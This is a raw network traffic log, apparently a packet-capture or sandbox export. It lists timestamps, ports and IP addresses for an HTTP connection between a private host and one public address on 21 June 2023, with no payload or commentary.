Jun 21, 2023 04:27:44.930291891 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.930327892 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.930351973 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.930375099 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.930396080 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.930406094 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.930437088 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.930445910 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.930465937 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.930500031 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.930510998 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.930532932 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.930561066 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.930562973 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.930584908 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.930587053 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.930649996 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.930975914 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.931988955 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.932024956 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.932048082 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.932070017 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.932099104 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.932101965 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.932123899 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.932131052 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.932287931 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.932287931 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.946528912 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.946609974 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.947320938 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.947371006 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.947412014 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.947442055 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.947463036 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.947463989 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.947505951 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.947547913 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.947561979 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.947591066 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.947659016 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.950443983 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.289979935 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.290060997 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.309544086 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.309633970 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.366508007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.366537094 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.366600990 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.376019001 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.376055956 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.393057108 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.393090010 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452187061 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452217102 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452236891 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452250004 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452272892 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452286959 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452301025 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452318907 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452339888 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452363014 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452380896 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.452389002 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452406883 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452469110 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.452502966 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.452544928 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452572107 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452590942 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452609062 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452627897 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452641010 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.452652931 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452661991 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.452677965 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452697992 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452721119 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452735901 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452754021 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452771902 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452789068 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452807903 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.452817917 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.452817917 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.452817917 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.452874899 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.453057051 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453083992 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453103065 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453121901 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453135014 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.453141928 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453160048 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453161001 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.453195095 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453216076 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.453231096 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453248978 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453269958 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.453286886 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453306913 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453325033 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453345060 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.453358889 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453377008 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453380108 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.453396082 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453413963 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453430891 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453435898 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.453449011 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453469038 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453481913 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.453494072 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453511000 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453530073 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453543901 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.453547955 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453562021 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.453566074 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453577995 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.453586102 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453603983 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.453608990 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.453646898 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.454061985 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454082012 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454101086 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454119921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454137087 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454165936 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.454165936 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.454179049 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454199076 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454216003 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454235077 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454247952 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.454252958 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454266071 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.454272032 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454292059 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454293966 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.454310894 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454329967 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454343081 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.454346895 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454365015 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454365969 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.454402924 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454421043 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454442024 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454446077 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.454459906 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454478979 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454482079 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.454497099 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454499960 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.454515934 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454533100 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.454541922 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.454588890 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.455028057 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455049038 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455065966 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455085039 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455104113 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455122948 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455131054 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.455141068 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455154896 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.455161095 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455172062 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.455178976 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455199957 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455213070 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.455219030 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455240011 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455243111 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.455257893 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455277920 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455296040 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455315113 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455315113 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.455334902 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455338955 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.455354929 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455355883 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.455374002 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455393076 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455410004 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455426931 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455440998 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.455446959 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455462933 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455482960 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.455498934 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.455915928 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455935955 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455952883 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455971956 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.455990076 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456001043 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.456007957 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456024885 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.456028938 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456048012 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456054926 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.456068993 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456082106 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456156969 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456173897 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456172943 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.456193924 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456212044 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456229925 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456243038 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.456249952 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456278086 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456298113 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456299067 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.456299067 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.456319094 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456338882 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456357956 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456377983 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456397057 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456397057 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.456398010 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.456414938 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456422091 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.456449032 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.456891060 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456918001 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456948042 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456969023 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456991911 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.456993103 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.457016945 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457019091 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.457041979 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457066059 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457067013 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.457089901 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457114935 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457137108 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457140923 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.457161903 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457166910 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.457185984 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457207918 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457231998 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457245111 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.457254887 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457273960 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.457279921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457294941 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.457304955 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457331896 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457355022 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457386017 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.457393885 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457420111 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457446098 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457470894 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457477093 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.457477093 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.457510948 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.457843065 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457870007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457895041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457920074 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457942963 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.457945108 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457969904 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.457977057 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.458017111 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458041906 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458055019 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.458071947 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458080053 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.458097935 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458123922 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458148956 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458168030 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.458175898 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458188057 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.458201885 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458230019 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458241940 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.458255053 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458281040 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458306074 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458328962 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.458333969 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458357096 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.458359957 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458386898 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458410978 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458432913 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.458436012 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458451986 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.458462954 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458487988 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458513021 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458532095 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.458554029 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.458841085 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458869934 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458909988 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458936930 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458962917 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.458961964 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.458986998 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.458987951 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459014893 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459042072 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459053993 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.459067106 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459079981 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.459095001 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459120989 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459137917 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.459146023 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459172010 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459197998 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459217072 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.459223032 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459244967 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.459250927 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459276915 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459297895 CEST	49709	80	192.168.2.3	188.114.96.7
